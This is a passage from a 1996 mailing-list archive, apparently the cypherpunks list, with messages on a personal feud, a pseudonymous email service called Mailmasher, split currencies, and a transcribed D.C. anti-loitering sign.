matter. I do not know about you, but I have more important things to do with my time than to engage in a ''war of words,'' with you and Bill. However, if you wound me, as you have repeatedly in the past, by such tactics, I will fight back furiously to the best of my abilities. I think it a terrible waste of your talents to engage in such conduct, and mine too of course. I do not expect either of you to agree with me unless you know me to be in the right. Either, or both of you, can criticize me all you want as long as such criticism is objective and based on facts. I seek a truce - and am willing to apologize publicly, if we can agree that we will not engage in personal subjective attacks on each other. The ball is in your court, I seek peace and a more productive usage of my time and will only respond in you lash out and try to wound me further. Appreciatively, Donald, ''Ralph'', Wood. "Civility in all human matters is the best indicator of intelligence!" - Aristotle ------- End of Forwarded Message From stewarts at ix.netcom.com Mon Sep 30 23:12:33 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 1 Oct 1996 14:12:33 +0800 Subject: Mailmasher Message-ID: <199610010403.VAA04509@dfw-ix6.ix.netcom.com> At 10:29 AM 9/30/96 -0400, Robert Hettinga wrote: > http://www.mailmasher.com/ Interesting (potentially; the Anonymizer isn't currently listening to me, and I'm not going to set up an account non-anonymized there. The operator nicely provides an Anonymized URL for getting there.) SSL is down, ostensibly for performance reasons. The mail system says it's basically pseudonymous - there's a privacy policy which says he doesn't log what accounts belong to whom. If the government wants to use subpoenas or warrants to seize his logs, the operator won't stop them, but the log files will be disappointing... The IP address is in space that appears to be hotwired.com Class C space. Poking around whois was interesting..... # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From unicorn at schloss.li Mon Sep 30 23:24:59 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 1 Oct 1996 14:24:59 +0800 Subject: the theory of split currency In-Reply-To: <199609301523.LAA15152@jekyll.piermont.com> Message-ID: On Mon, 30 Sep 1996, Perry E. Metzger wrote: > > > Is there a name for a dual or split currency, in which > > there is one currency for domestic use and another, different > > appearing, currency for foreign usage? > > I don't know of such a name, however... I have heard "Divided currency" "Distinct Currency" "Seperated Currency" all of which suggest to me that there is no real name. > > > Does anyone know of any country which has had such a > > split currency? > > ...this has been a common situation, in fact. South Africa, China, the > Soviet Union, and other unpleasant places have repeatedly done > this. Its usually a remarkably stupid idea. Concur. I'm not even sure proponents of the idea have any idea what it is supposed to do or what it infact does. It tends to be a cure-all type measure for anything from money laundering prevention to capital preservation. In reality about all it does is make it harder to do business with and in said economies. It may be used, in the more draconian states, to seperate treatment of those engaged in foreign commerce from those not involved in international transactions (read rich and poor). > > Perry > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Mon Sep 30 23:44:22 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 1 Oct 1996 14:44:22 +0800 Subject: Signs of Trouble in D.C. Message-ID: Signs of unrest in the nation's capital. These signs began to appear all over yesterday. WARNING THIS AREA HAS BEEN DECLARED A DRUG FREE ZONE Any person congregating in a group of 2 or more persons on public space within the boundaries of this drug free zone for the purpose of participating in the use, purchase of sale of illegal drugs, and who fails to disperse after being instructed to disperse by a uniformed member of the Metropolitan Police Department, is subject to arrest. An arrest can result in a fine of not more than $300, Imprisonment for not more than 180 days or both. Boundaries _________________________ Dates and Times _________________________ Larry D. Soulsby Chief of Police (Act 11-278, Anti-Loitering/Drug Free Zone Emergency Act of 1996) -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li